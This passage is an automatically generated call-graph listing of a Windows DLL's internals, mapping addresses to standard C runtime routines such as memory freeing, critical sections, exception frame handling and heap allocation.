12679 6d7e4302 12677->12679 12678->12671 12683 6d7e4318 12679->12683 12682 6d7e49e0 __freea 14 API calls 12682->12678 12684 6d7e432d 12683->12684 12685 6d7e4333 12683->12685 12687 6d7e49e0 __freea 14 API calls 12684->12687 12686 6d7e49e0 __freea 14 API calls 12685->12686 12688 6d7e433f 12686->12688 12687->12685 12689 6d7e49e0 __freea 14 API calls 12688->12689 12690 6d7e434a 12689->12690 12691 6d7e49e0 __freea 14 API calls 12690->12691 12692 6d7e4355 12691->12692 12693 6d7e49e0 __freea 14 API calls 12692->12693 12694 6d7e4360 12693->12694 12695 6d7e49e0 __freea 14 API calls 12694->12695 12696 6d7e436b 12695->12696 12697 6d7e49e0 __freea 14 API calls 12696->12697 12698 6d7e4376 12697->12698 12699 6d7e49e0 __freea 14 API calls 12698->12699 12700 6d7e4381 12699->12700 12701 6d7e49e0 __freea 14 API calls 12700->12701 12702 6d7e438c 12701->12702 12703 6d7e49e0 __freea 14 API calls 12702->12703 12704 6d7e439a 12703->12704 12709 6d7e4144 12704->12709 12710 6d7e4150 __FrameHandler3::FrameUnwindToState 12709->12710 12725 6d7e4828 EnterCriticalSection 12710->12725 12713 6d7e415a 12715 6d7e49e0 __freea 14 API calls 12713->12715 12716 6d7e4184 12713->12716 12715->12716 12726 6d7e41a3 12716->12726 12717 6d7e41af 12718 6d7e41bb __FrameHandler3::FrameUnwindToState 12717->12718 12730 6d7e4828 EnterCriticalSection 12718->12730 12720 6d7e41c5 12731 6d7e43e5 12720->12731 12722 6d7e41d8 12735 6d7e41f8 12722->12735 12725->12713 12729 6d7e4870 LeaveCriticalSection 12726->12729 12728 6d7e4191 12728->12717 12729->12728 12730->12720 12732 6d7e441b _unexpected 12731->12732 12733 6d7e43f4 _unexpected 12731->12733 12732->12722 12733->12732 12738 6d7e7145 12733->12738 12848 6d7e4870 LeaveCriticalSection 12735->12848 12737 6d7e41e6 12737->12682 12739 6d7e71c5 12738->12739 12746 6d7e715b 12738->12746 12741 6d7e49e0 __freea 14 API calls 12739->12741 12765 6d7e7213 12739->12765 12742 6d7e71e7 12741->12742 12744 6d7e49e0 __freea 14 API calls 12742->12744 12743 6d7e718e 12745 6d7e71b0 12743->12745 12753 6d7e49e0 __freea 14 API calls 12743->12753 12747 6d7e71fa 12744->12747 12748 6d7e49e0 __freea 14 API calls 12745->12748 12746->12739 12746->12743 12749 6d7e49e0 __freea 14 API calls 12746->12749 12752 6d7e49e0 __freea 14 API calls 12747->12752 12754 6d7e71ba 12748->12754 12751 6d7e7183 12749->12751 12750 6d7e7221 12755 6d7e7281 12750->12755 12764 6d7e49e0 14 API calls __freea 12750->12764 12766 6d7e7462 12751->12766 12757 6d7e7208 12752->12757 12758 6d7e71a5 12753->12758 12759 6d7e49e0 __freea 14 API calls 12754->12759 12760 6d7e49e0 __freea 14 API calls 12755->12760 12762 6d7e49e0 __freea 14 API calls 12757->12762 12794 6d7e7560 12758->12794 12759->12739 12761 6d7e7287 12760->12761 12761->12732 12762->12765 12764->12750 12806 6d7e72b6 12765->12806 12767 6d7e755c 12766->12767 12768 6d7e7473 12766->12768 12767->12743 12769 6d7e7484 12768->12769 12770 6d7e49e0 __freea 14 API calls 12768->12770 12771 6d7e7496 12769->12771 12772 6d7e49e0 __freea 14 API calls 12769->12772 12770->12769 12773 6d7e74a8 12771->12773 12775 6d7e49e0 __freea 14 API calls 12771->12775 12772->12771 12774 6d7e74ba 12773->12774 12776 6d7e49e0 __freea 14 API calls 12773->12776 12777 6d7e74cc 12774->12777 12778 6d7e49e0 __freea 14 API calls 12774->12778 12775->12773 12776->12774 12779 6d7e74de 12777->12779 12780 6d7e49e0 __freea 14 API calls 12777->12780 12778->12777 12781 6d7e74f0 12779->12781 12783 6d7e49e0 __freea 14 API calls 12779->12783 12780->12779 12782 6d7e7502 12781->12782 12784 6d7e49e0 __freea 14 API calls 12781->12784 12785 6d7e7514 12782->12785 12786 6d7e49e0 __freea 14 API calls 12782->12786 12783->12781 12784->12782 12787 6d7e7526 12785->12787 12788 6d7e49e0 __freea 14 API calls 12785->12788 12786->12785 12789 6d7e7538 12787->12789 12791 6d7e49e0 __freea 14 API calls 12787->12791 12788->12787 12790 6d7e754a 12789->12790 12792 6d7e49e0 __freea 14 API calls 12789->12792 12790->12767 12793 6d7e49e0 __freea 14 API calls 12790->12793 12791->12789 12792->12790 12793->12767 12795 6d7e756d 12794->12795 12805 6d7e75c5 12794->12805 12796 6d7e757d 12795->12796 12798 6d7e49e0 __freea 14 API calls 12795->12798 12797 6d7e758f 12796->12797 12799 6d7e49e0 __freea 14 API calls 12796->12799 12800 6d7e75a1 12797->12800 12801 6d7e49e0 __freea 14 API calls 12797->12801 12798->12796 12799->12797 12802 6d7e75b3 12800->12802 12803 6d7e49e0 __freea 14 API calls 12800->12803 12801->12800 12804 6d7e49e0 __freea 14 API calls 12802->12804 12802->12805 12803->12802 12804->12805 12805->12745 12807 6d7e72e2 12806->12807 12808 6d7e72c3 12806->12808 12807->12750 12808->12807 12812 6d7e75ee 12808->12812 12811 6d7e49e0 __freea 14 API calls 12811->12807 12813 6d7e72dc 12812->12813 12814 6d7e75ff 12812->12814 12813->12811 12815 6d7e75c9 _unexpected 14 API calls 12814->12815 12816 6d7e7607 12815->12816 12817 6d7e75c9 _unexpected 14 API calls 12816->12817 12818 6d7e7612 12817->12818 12819 6d7e75c9 _unexpected 14 API calls 12818->12819 12820 6d7e761d 12819->12820 12821 6d7e75c9 _unexpected 14 API calls 12820->12821 12822 6d7e7628 12821->12822 12823 6d7e75c9 _unexpected 14 API calls 12822->12823 12824 6d7e7636 12823->12824 12825 6d7e49e0 __freea 14 API calls 12824->12825 12826 6d7e7641 12825->12826 12827 6d7e49e0 __freea 14 API calls 12826->12827 12828 6d7e764c 12827->12828 12829 6d7e49e0 __freea 14 API calls 12828->12829 12830 6d7e7657 12829->12830 12831 6d7e75c9 _unexpected 14 API calls 12830->12831 12832 6d7e7665 12831->12832 12833 6d7e75c9 _unexpected 14 API calls 12832->12833 12834 6d7e7673 12833->12834 12835 6d7e75c9 _unexpected 14 API calls 12834->12835 12836 6d7e7684 12835->12836 12837 6d7e75c9 _unexpected 14 API calls 12836->12837 12838 6d7e7692 12837->12838 12839 6d7e75c9 _unexpected 14 API calls 12838->12839 12840 6d7e76a0 12839->12840 12841 6d7e49e0 __freea 14 API calls 12840->12841 12842 6d7e76ab 12841->12842 12843 6d7e49e0 __freea 14 API calls 12842->12843 12844 6d7e76b6 12843->12844 12845 6d7e49e0 __freea 14 API calls 12844->12845 12846 6d7e76c1 12845->12846 12847 6d7e49e0 __freea 14 API calls 12846->12847 12847->12813 12848->12737 12850 6d7de446 12849->12850 12851 6d7e13df 12849->12851 12850->12574 12857 6d7e1858 12851->12857 12854 6d7e1893 ___vcrt_FlsSetValue 6 API calls 12855 6d7e13f5 12854->12855 12862 6d7e13b9 12855->12862 12858 6d7e16f7 ___vcrt_InitializeCriticalSectionEx 5 API calls 12857->12858 12859 6d7e1872 12858->12859 12860 6d7e13e6 12859->12860 12861 6d7e188a TlsGetValue 12859->12861 12860->12854 12861->12860 12863 6d7e13c3 12862->12863 12864 6d7e13d0 12862->12864 12863->12864 12865 6d7e3e86 ___std_exception_copy 14 API calls 12863->12865 12864->12850 12865->12864 12872 6d7e140e 12866->12872 12868 6d7de422 12868->12597 12869 6d7e3d94 12868->12869 12870 6d7e45ad __dosmaperr 14 API calls 12869->12870 12871 6d7de42e 12870->12871 12871->12600 12871->12601 12873 6d7e141a GetLastError 12872->12873 12874 6d7e1417 12872->12874 12875 6d7e1858 ___vcrt_FlsGetValue 6 API calls 12873->12875 12874->12868 12876 6d7e142f 12875->12876 12877 6d7e1494 SetLastError 12876->12877 12878 6d7e1893 ___vcrt_FlsSetValue 6 API calls 12876->12878 12885 6d7e144e 12876->12885 12877->12868 12879 6d7e1448 __CreateFrameInfo 12878->12879 12880 6d7e1470 12879->12880 12881 6d7e1893 ___vcrt_FlsSetValue 6 API calls 12879->12881 12879->12885 12882 6d7e1893 ___vcrt_FlsSetValue 6 API calls 12880->12882 12883 6d7e1484 12880->12883 12881->12880 12882->12883 12884 6d7e3e86 ___std_exception_copy 14 API calls 12883->12884 12884->12885 12885->12877 13995 6d7e3ced 13998 6d7e3d54 13995->13998 13999 6d7e3d00 13998->13999 14000 6d7e3d68 13998->14000 14000->13999 14001 6d7e49e0 __freea 14 API calls 14000->14001 14001->13999 14002 6d7e47e7 14003 6d7e47f2 14002->14003 14005 6d7e481b 14003->14005 14007 6d7e4817 14003->14007 14008 6d7e6344 14003->14008 14013 6d7e483f 14005->14013 14009 6d7e6161 _unexpected 5 API calls 14008->14009 14010 6d7e6360 14009->14010 14011 6d7e637e InitializeCriticalSectionAndSpinCount 14010->14011 14012 6d7e6369 14010->14012 14011->14012 14012->14003 14014 6d7e486b 14013->14014 14015 6d7e484c 14013->14015 14014->14007 14016 6d7e4856 DeleteCriticalSection 14015->14016 14016->14014 14016->14016 14017 6d7cc6e0 14019 6d7cc6f4 14017->14019 14018 6d7cc83f 14019->14018 14020 6d7d8ba0 40 API calls 14019->14020 14020->14019 13152 6d7e125c 13153 6d7e1295 13152->13153 13154 6d7e1265 13152->13154 13154->13153 13161 6d7e1400 13154->13161 13157 6d7e1400 __CreateFrameInfo 49 API calls 13158 6d7e12ab 13157->13158 13175 6d7e3efa 13158->13175 13162 6d7e140e __CreateFrameInfo 23 API calls 13161->13162 13163 6d7e1405 13162->13163 13164 6d7e12a0 13163->13164 13165 6d7e67df __FrameHandler3::FrameUnwindToState 2 API calls 13163->13165 13164->13157 13166 6d7e3f95 13165->13166 13169 6d7e6824 __FrameHandler3::FrameUnwindToState 39 API calls 13166->13169 13170 6d7e3fa0 13166->13170 13167 6d7e3fc9 13172 6d7e3404 __FrameHandler3::FrameUnwindToState 21 API calls 13167->13172 13168 6d7e3faa IsProcessorFeaturePresent 13171 6d7e3fb6 13168->13171 13169->13170 13170->13167 13170->13168 13173 6d7e2c9d __FrameHandler3::FrameUnwindToState 8 API calls 13171->13173 13174 6d7e3fd3 13172->13174 13173->13167 13176 6d7e3f06 __FrameHandler3::FrameUnwindToState 13175->13176 13177 6d7e445c _unexpected 39 API calls 13176->13177 13178 6d7e3f0b 13177->13178 13179 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 13178->13179 13180 6d7e3f35 13179->13180 14021 6d7df0db 14022 6d7df913 ___std_exception_destroy 14 API calls 14021->14022 14023 6d7df0ea 14022->14023 13181 6d7e1050 13182 6d7e106e __InternalCxxFrameHandler 13181->13182 13193 6d7e1010 13182->13193 13194 6d7e102f 13193->13194 13195 6d7e1022 13193->13195 13196 6d7de360 _ValidateLocalCookies 5 API calls 13195->13196 13196->13194 13197 6d7de449 13198 6d7de451 ___scrt_release_startup_lock 13197->13198 13201 6d7e2f8b 13198->13201 13200 6d7de479 13202 6d7e2f9e 13201->13202 13203 6d7e2f9a 13201->13203 13206 6d7e2fab 13202->13206 13203->13200 13207 6d7e45ad __dosmaperr 14 API calls 13206->13207 13208 6d7e2fa7 13207->13208 13208->13200 14027 6d7ea7c7 14028 6d7ea7d0 14027->14028 14031 6d7eacec 14028->14031 14032 6d7ead2b __startOneArgErrorHandling 14031->14032 14036 6d7eadb3 __startOneArgErrorHandling 14032->14036 14039 6d7eb192 14032->14039 14034 6d7eb4a6 __startOneArgErrorHandling 14 API calls 14035 6d7eade8 14034->14035 14037 6d7de360 _ValidateLocalCookies 5 API calls 14035->14037 14036->14034 14036->14035 14038 6d7ea7f0 14037->14038 14040 6d7eb1b5 __raise_exc RaiseException 14039->14040 14041 6d7eb1b0 14040->14041 14041->14036 14042 6d7e4bc7 14043 6d7e4bed 14042->14043 14044 6d7e4bd7 14042->14044 14050 6d7e4c58 14043->14050 14055 6d7e4c6c 14043->14055 14066 6d7e4d44 14043->14066 14045 6d7e4970 __dosmaperr 14 API calls 14044->14045 14046 6d7e4bdc 14045->14046 14047 6d7e2e99 ___std_exception_copy 39 API calls 14046->14047 14049 6d7e4be6 14047->14049 14048 6d7e36d2 14 API calls 14051 6d7e4c9b 14048->14051 14050->14048 14050->14050 14053 6d7e4ca4 14051->14053 14061 6d7e4cba 14051->14061 14054 6d7e49e0 __freea 14 API calls 14053->14054 14054->14055 14084 6d7e50fc 14055->14084 14056 6d7e4d1a 14057 6d7e49e0 __freea 14 API calls 14056->14057 14059 6d7e4d27 14057->14059 14060 6d7e50fc 14 API calls 14059->14060 14060->14049 14061->14056 14063 6d7e4d37 14061->14063 14090 6d7e7da5 14061->14090 14064 6d7e2ec6 ___std_exception_copy 11 API calls 14063->14064 14065 6d7e4d43 14064->14065 14067 6d7e4d50 14066->14067 14067->14067 14068 6d7e4983 _unexpected 14 API calls 14067->14068 14069 6d7e4d7e 14068->14069 14070 6d7e7da5 39 API calls 14069->14070 14071 6d7e4daa 14070->14071 14072 6d7e2ec6 ___std_exception_copy 11 API calls 14071->14072 14073 6d7e4df4 14072->14073 14074 6d7e5145 39 API calls 14073->14074 14075 6d7e4ebc 14074->14075 14099 6d7e4baa 14075->14099 14078 6d7e4f20 14079 6d7e5145 39 API calls 14078->14079 14080 6d7e4f5d 14079->14080 14102 6d7e4ae4 14080->14102 14083 6d7e4d44 45 API calls 14085 6d7e5106 14084->14085 14086 6d7e5116 14085->14086 14087 6d7e49e0 __freea 14 API calls 14085->14087 14088 6d7e49e0 __freea 14 API calls 14086->14088 14087->14085 14089 6d7e511d 14088->14089 14089->14049 14092 6d7e7cee 14090->14092 14091 6d7e7d08 14093 6d7e7d1c 14091->14093 14094 6d7e4970 __dosmaperr 14 API calls 14091->14094 14092->14091 14092->14093 14097 6d7e7d41 14092->14097 14093->14061 14095 6d7e7d12 14094->14095 14096 6d7e2e99 ___std_exception_copy 39 API calls 14095->14096 14096->14093 14097->14093 14098 6d7e4970 __dosmaperr 14 API calls 14097->14098 14098->14095 14125 6d7e4a32 14099->14125 14103 6d7e4b0e 14102->14103 14104 6d7e4af2 14102->14104 14106 6d7e4b15 14103->14106 14107 6d7e4b31 14103->14107 14105 6d7e5184 14 API calls 14104->14105 14111 6d7e4afc 14105->14111 14106->14111 14155 6d7e519e 14106->14155 14108 6d7e5e98 ___scrt_uninitialize_crt WideCharToMultiByte 14107->14108 14110 6d7e4b41 14108->14110 14112 6d7e4b5e 14110->14112 14113 6d7e4b48 GetLastError 14110->14113 14111->14083 14114 6d7e4b6f 14112->14114 14116 6d7e519e 15 API calls 14112->14116 14115 6d7e4916 __dosmaperr 14 API calls 14113->14115 14114->14111 14117 6d7e5121 WideCharToMultiByte 14114->14117 14118 6d7e4b54 14115->14118 14116->14114 14120 6d7e4b85 14117->14120 14119 6d7e4970 __dosmaperr 14 API calls 14118->14119 14119->14111 14120->14111 14121 6d7e4b89 GetLastError 14120->14121 14122 6d7e4916 __dosmaperr 14 API calls 14121->14122 14123 6d7e4b95 14122->14123 14124 6d7e4970 __dosmaperr 14 API calls 14123->14124 14124->14111 14126 6d7e4a5a 14125->14126 14127 6d7e4a40 14125->14127 14129 6d7e4a80 14126->14129 14130 6d7e4a61 14126->14130 14143 6d7e5184 14127->14143 14131 6d7e5dde ___scrt_uninitialize_crt MultiByteToWideChar 14129->14131 14142 6d7e4a4a FindFirstFileExW 14130->14142 14147 6d7e51da 14130->14147 14132 6d7e4a8f 14131->14132 14134 6d7e4a96 GetLastError 14132->14134 14136 6d7e4abc 14132->14136 14138 6d7e51da 15 API calls 14132->14138 14135 6d7e4916 __dosmaperr 14 API calls 14134->14135 14137 6d7e4aa2 14135->14137 14139 6d7e5dde ___scrt_uninitialize_crt MultiByteToWideChar 14136->14139 14136->14142 14141 6d7e4970 __dosmaperr 14 API calls 14137->14141 14138->14136 14140 6d7e4ad3 14139->14140 14140->14134 14140->14142 14141->14142 14142->14078 14144 6d7e518f 14143->14144 14145 6d7e5197 14143->14145 14146 6d7e49e0 __freea 14 API calls 14144->14146 14145->14142 14146->14145 14148 6d7e5184 14 API calls 14147->14148 14149 6d7e51e8 14148->14149 14152 6d7e5219 14149->14152 14153 6d7e6e64 15 API calls 14152->14153 14154 6d7e51f9 14153->14154 14154->14142 14156 6d7e5184 14 API calls 14155->14156 14157 6d7e51ac 14156->14157 14158 6d7e5219 15 API calls 14157->14158 14159 6d7e51ba 14158->14159 14159->14111 13212 6d7e6245 13213 6d7e6161 _unexpected 5 API calls 13212->13213 13214 6d7e6261 13213->13214 13215 6d7e6279 TlsAlloc 13214->13215 13216 6d7e626a 13214->13216 13215->13216 14160 6d7cb9c0 14163 6d7cba07 14160->14163 14161 6d7c1120 42 API calls 14161->14163 14162 6d7cbb18 14163->14161 14163->14162 14164 6d7e24c2 14165 6d7e24d0 ___except_validate_context_record 14164->14165 14166 6d7e1400 __CreateFrameInfo 49 API calls 14165->14166 14169 6d7e24d6 14166->14169 14167 6d7e2515 14172 6d7e2533 14167->14172 14173 6d7e2877 14167->14173 14168 6d7e253b 14168->14172 14176 6d7e1f59 14168->14176 14169->14167 14169->14168 14169->14172 14227 6d7e288f 14173->14227 14175 6d7e288a 14175->14172 14180 6d7e1f79 __FrameHandler3::FrameUnwindToState 14176->14180 14177 6d7e228c 14178 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 14177->14178 14189 6d7e2292 14177->14189 14179 6d7e22fd 14178->14179 14180->14177 14183 6d7e205b 14180->14183 14185 6d7e1400 __CreateFrameInfo 49 API calls 14180->14185 14181 6d7e2261 14181->14177 14182 6d7e225f 14181->14182 14261 6d7e22fe 14181->14261 14184 6d7e1400 __CreateFrameInfo 49 API calls 14182->14184 14183->14181 14186 6d7e20e4 14183->14186 14225 6d7e2061 type_info::operator== 14183->14225 14184->14177 14187 6d7e1fdb 14185->14187 14194 6d7e21fb __InternalCxxFrameHandler 14186->14194 14246 6d7e1953 14186->14246 14187->14189 14191 6d7e1400 __CreateFrameInfo 49 API calls 14187->14191 14189->14172 14192 6d7e1fe9 14191->14192 14195 6d7e1400 __CreateFrameInfo 49 API calls 14192->14195 14193 6d7e222b 14193->14182 14196 6d7e2235 14193->14196 14194->14182 14194->14193 14194->14196 14197 6d7e2250 14194->14197 14204 6d7e1ff1 14195->14204 14198 6d7e1400 __CreateFrameInfo 49 API calls 14196->14198 14199 6d7e2977 __InternalCxxFrameHandler 39 API calls 14197->14199 14200 6d7e2240 14198->14200 14201 6d7e2259 14199->14201 14202 6d7e1400 __CreateFrameInfo 49 API calls 14200->14202 14201->14182 14203 6d7e22bc 14201->14203 14202->14225 14206 6d7e1400 __CreateFrameInfo 49 API calls 14203->14206 14204->14177 14205 6d7e1400 __CreateFrameInfo 49 API calls 14204->14205 14207 6d7e203a 14205->14207 14208 6d7e22c1 14206->14208 14207->14183 14212 6d7e1400 __CreateFrameInfo 49 API calls 14207->14212 14210 6d7e1400 __CreateFrameInfo 49 API calls 14208->14210 14209 6d7e3efa _unexpected 39 API calls 14220 6d7e229c __InternalCxxFrameHandler 14209->14220 14213 6d7e22c9 14210->14213 14211 6d7e2105 ___TypeMatch 14211->14194 14251 6d7e1ed9 14211->14251 14214 6d7e2044 14212->14214 14278 6d7e1b3f RtlUnwind 14213->14278 14217 6d7e1400 __CreateFrameInfo 49 API calls 14214->14217 14218 6d7e204f 14217->14218 14241 6d7e2977 14218->14241 14219 6d7e22dd 14222 6d7e2877 __InternalCxxFrameHandler 49 API calls 14219->14222 14224 6d7df844 std::_Xinvalid_argument RaiseException 14220->14224 14223 6d7e22e9 __InternalCxxFrameHandler 14222->14223 14279 6d7e27ee 14223->14279 14224->14203 14225->14209 14225->14220 14228 6d7e289b __FrameHandler3::FrameUnwindToState 14227->14228 14229 6d7e1400 __CreateFrameInfo 49 API calls 14228->14229 14235 6d7e28b6 __CallSettingFrame@12 CatchIt 14229->14235 14231 6d7e2936 14232 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 14231->14232 14233 6d7e293b CatchIt 14231->14233 14234 6d7e2976 14232->14234 14233->14175 14235->14231 14236 6d7e295d 14235->14236 14237 6d7e1400 __CreateFrameInfo 49 API calls 14236->14237 14238 6d7e2962 14237->14238 14239 6d7e296d 14238->14239 14240 6d7e1400 __CreateFrameInfo 49 API calls 14238->14240 14239->14231 14240->14239 14242 6d7e2a0b 14241->14242 14245 6d7e298b ___TypeMatch 14241->14245 14243 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 14242->14243 14244 6d7e2a10 14243->14244 14245->14183 14247 6d7e196f 14246->14247 14248 6d7e19a6 14247->14248 14249 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 14247->14249 14248->14211 14250 6d7e19c1 14249->14250 14252 6d7e1eeb 14251->14252 14255 6d7e1ef8 14251->14255 14294 6d7e1e40 14252->14294 14298 6d7e1b3f RtlUnwind 14255->14298 14256 6d7e1f0d 14257 6d7e288f __FrameHandler3::FrameUnwindToState 49 API calls 14256->14257 14258 6d7e1f1e CatchIt 14257->14258 14299 6d7e261f 14258->14299 14260 6d7e1f46 CatchIt 14260->14211 14262 6d7e2429 14261->14262 14263 6d7e2314 14261->14263 14262->14182 14264 6d7e1400 __CreateFrameInfo 49 API calls 14263->14264 14265 6d7e231b 14264->14265 14266 6d7e235d 14265->14266 14267 6d7e2322 EncodePointer 14265->14267 14266->14262 14269 6d7e242e 14266->14269 14270 6d7e237a 14266->14270 14268 6d7e1400 __CreateFrameInfo 49 API calls 14267->14268 14275 6d7e2330 14268->14275 14271 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 14269->14271 14272 6d7e1953 __InternalCxxFrameHandler 39 API calls 14270->14272 14274 6d7e2433 14271->14274 14273 6d7e2391 14272->14273 14273->14262 14277 6d7e1ed9 CatchIt 50 API calls 14273->14277 14275->14266 14276 6d7e1a1f __InternalCxxFrameHandler 49 API calls 14275->14276 14276->14266 14277->14273 14278->14219 14280 6d7e27fa __EH_prolog3_catch 14279->14280 14281 6d7e1400 __CreateFrameInfo 49 API calls 14280->14281 14282 6d7e27ff 14281->14282 14283 6d7e2822 14282->14283 14359 6d7e2a8c 14282->14359 14285 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 14283->14285 14290 6d7e2827 14285->14290 14288 6d7e2873 14288->14177 14290->14288 14292 6d7e1400 __CreateFrameInfo 49 API calls 14290->14292 14293 6d7e2869 14292->14293 14293->14177 14295 6d7e1e4c __FrameHandler3::FrameUnwindToState 14294->14295 14313 6d7e1d02 14295->14313 14297 6d7e1e74 CatchIt ___AdjustPointer 14297->14255 14298->14256 14300 6d7e262b __FrameHandler3::FrameUnwindToState 14299->14300 14320 6d7e1bc3 14300->14320 14303 6d7e1400 __CreateFrameInfo 49 API calls 14304 6d7e2657 14303->14304 14305 6d7e1400 __CreateFrameInfo 49 API calls 14304->14305 14306 6d7e2662 14305->14306 14307 6d7e1400 __CreateFrameInfo 49 API calls 14306->14307 14308 6d7e266d 14307->14308 14309 6d7e1400 __CreateFrameInfo 49 API calls 14308->14309 14310 6d7e2675 CatchIt 14309->14310 14325 6d7e2772 14310->14325 14312 6d7e275a 14312->14260 14314 6d7e1d0e __FrameHandler3::FrameUnwindToState 14313->14314 14315 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 14314->14315 14317 6d7e1d89 CatchIt ___AdjustPointer 14314->14317 14316 6d7e1e3f __FrameHandler3::FrameUnwindToState 14315->14316 14318 6d7e1d02 CatchIt 39 API calls 14316->14318 14317->14297 14319 6d7e1e74 CatchIt ___AdjustPointer 14318->14319 14319->14297 14321 6d7e1400 __CreateFrameInfo 49 API calls 14320->14321 14322 6d7e1bd4 14321->14322 14323 6d7e1400 __CreateFrameInfo 49 API calls 14322->14323 14324 6d7e1bdf 14323->14324 14324->14303 14334 6d7e1be7 14325->14334 14327 6d7e2783 14328 6d7e1400 __CreateFrameInfo 49 API calls 14327->14328 14329 6d7e2789 14328->14329 14330 6d7e1400 __CreateFrameInfo 49 API calls 14329->14330 14331 6d7e2794 14330->14331 14333 6d7e27d5 __InternalCxxFrameHandler 14331->14333 14351 6d7e12b4 14331->14351 14333->14312 14335 6d7e1400 __CreateFrameInfo 49 API calls 14334->14335 14336 6d7e1bf0 14335->14336 14337 6d7e1bf8 14336->14337 14338 6d7e1c06 14336->14338 14339 6d7e1400 __CreateFrameInfo 49 API calls 14337->14339 14340 6d7e1400 __CreateFrameInfo 49 API calls 14338->14340 14343 6d7e1c00 14339->14343 14342 6d7e1c0b 14340->14342 14341 6d7e3f90 __FrameHandler3::FrameUnwindToState 39 API calls 14344 6d7e1c2e 14341->14344 14342->14341 14342->14343 14343->14327 14345 6d7de360 _ValidateLocalCookies 5 API calls 14344->14345 14347 6d7e1c43 ___CxxFrameHandler 14345->14347 14346 6d7e1c4e 14346->14327 14347->14346 14348 6d7e1c9d 14347->14348 14354 6d7e1b3f RtlUnwind 14347->14354 14355 6d7e1a1f 14348->14355 14352 6d7e1400 __CreateFrameInfo 49 API calls 14351->14352 14353 6d7e12bc 14352->14353 14353->14333 14354->14348 14356 6d7e1a41 __InternalCxxFrameHandler 14355->14356 14358 6d7e1a2f 14355->14358 14357 6d7e1400 __CreateFrameInfo 49 API calls 14356->14357 14357->14358 14358->14346 14360 6d7e1400 __CreateFrameInfo 49 API calls 14359->14360 14361 6d7e2a92 14360->14361 14362 6d7e3efa _unexpected 39 API calls 14361->14362 14363 6d7e2aa8 14362->14363 14367 6d7de9c3 ___scrt_dllmain_exception_filter 14368 6d7e47c0 14371 6d7e4747 14368->14371 14372 6d7e4753 __FrameHandler3::FrameUnwindToState 14371->14372 14379 6d7e4828 EnterCriticalSection 14372->14379 14374 6d7e478b 14380 6d7e47a9 14374->14380 14375 6d7e475d 14375->14374 14377 6d7e7412 ___scrt_uninitialize_crt 14 API calls 14375->14377 14377->14375 14379->14375 14383 6d7e4870 LeaveCriticalSection 14380->14383 14382 6d7e4797 14383->14382 12886 6d7e5f3b GetEnvironmentStringsW 12887 6d7e5fd6 12886->12887 12888 6d7e5f53 12886->12888 12907 6d7e5e98 12888->12907 12890 6d7e5f70 12891 6d7e5f7a FreeEnvironmentStringsW 12890->12891 12892 6d7e5f85 12890->12892 12891->12887 12910 6d7e6e64 12892->12910 12895 6d7e5f94 12897 6d7e49e0 __freea 14 API calls 12895->12897 12896 6d7e5fa5 12898 6d7e5e98 ___scrt_uninitialize_crt WideCharToMultiByte 12896->12898 12899 6d7e5f99 FreeEnvironmentStringsW 12897->12899 12900 6d7e5fb5 12898->12900 12899->12887 12901 6d7e5fbc 12900->12901 12902 6d7e5fc4 12900->12902 12904 6d7e49e0 __freea 14 API calls 12901->12904 12903 6d7e49e0 __freea 14 API calls 12902->12903 12905 6d7e5fc2 FreeEnvironmentStringsW 12903->12905 12904->12905 12905->12887 12909 6d7e5eab ___scrt_uninitialize_crt 12907->12909 12908 6d7e5ee9 WideCharToMultiByte 12908->12890 12909->12908 12911 6d7e6ea2 12910->12911 12912 6d7e6e72 _unexpected 12910->12912 12914 6d7e4970 __dosmaperr 14 API calls 12911->12914 12912->12911 12913 6d7e6e8d RtlAllocateHeap 12912->12913 12917 6d7e3df8 12912->12917 12913->12912 12915 6d7e5f8c 12913->12915 12914->12915 12915->12895 12915->12896 12920 6d7e3e24 12917->12920 12921 6d7e3e30 __FrameHandler3::FrameUnwindToState 12920->12921 12926 6d7e4828 EnterCriticalSection 12921->12926 12923 6d7e3e3b __FrameHandler3::FrameUnwindToState 12927 6d7e3e72 12923->12927 12926->12923 12930 6d7e4870 LeaveCriticalSection 12927->12930 12929 6d7e3e03 12929->12912 12930->12929 13217 6d7e5238 13218 6d7e524a 13217->13218 13219 6d7e5246 13217->13219 13220 6d7e524f 13218->13220 13221 6d7e5275 13218->13221 13222 6d7e4983 _unexpected 14 API calls 13220->13222 13221->13219 13228 6d7e5fdb 13221->13228 13223 6d7e5258 13222->13223 13225 6d7e49e0 __freea 14 API calls 13223->13225 13225->13219 13226 6d7e5295 13227 6d7e49e0 __freea 14 API calls 13226->13227 13227->13219 13229 6d7e5fe8 13228->13229 13230 6d7e6003 13228->13230 13229->13230 13231 6d7e5ff4 13229->13231 13232 6d7e6012 13230->13232 13237 6d7e80db 13230->13237 13233 6d7e4970 __dosmaperr 14 API calls 13231->13233 13244 6d7e810e 13232->13244 13235 6d7e5ff9 std::bad_exception::bad_exception 13233->13235 13235->13226 13238 6d7e80fb HeapSize 13237->13238 13239 6d7e80e6 13237->13239 13238->13232 13240 6d7e4970 __dosmaperr 14 API calls 13239->13240 13241 6d7e80eb 13240->13241 13242 6d7e2e99 ___std_exception_copy 39 API calls 13241->13242 13243 6d7e80f6 13242->13243 13243->13232 13245 6d7e811b 13244->13245 13246 6d7e8126 13244->13246 13247 6d7e6e64 15 API calls 13245->13247 13248 6d7e812e 13246->13248 13254 6d7e8137 _unexpected 13246->13254 13252 6d7e8123 13247->13252 13249 6d7e49e0 __freea 14 API calls 13248->13249 13249->13252 13250 6d7e813c 13253 6d7e4970 __dosmaperr 14 API calls 13250->13253 13251 6d7e8161 HeapReAlloc 13251->13252 13251->13254 13252->13235 13253->13252 13254->13250 13254->13251 13255 6d7e3df8 _unexpected 2 API calls 13254->13255 13255->13254 14384 6d7ebab9 14385 6d7de360 _ValidateLocalCookies 5 API calls 14384->14385 14386 6d7ebacf 14385->14386 14387 6d7de360 _ValidateLocalCookies 5 API calls 14386->14387 14388 6d7ebad9 14387->14388 13256 6d7bde30 13341 6d7cc0d0 13256->13341 13259 6d7cc0d0 5 API calls 13260 6d7bde62 13259->13260 13349 6d7cbb30 13260->13349 13262 6d7bde88 13263 6d7cbb30 40 API calls 13262->13263 13264 6d7bdee4 13263->13264 13357 6d7baed0 13264->13357 13266 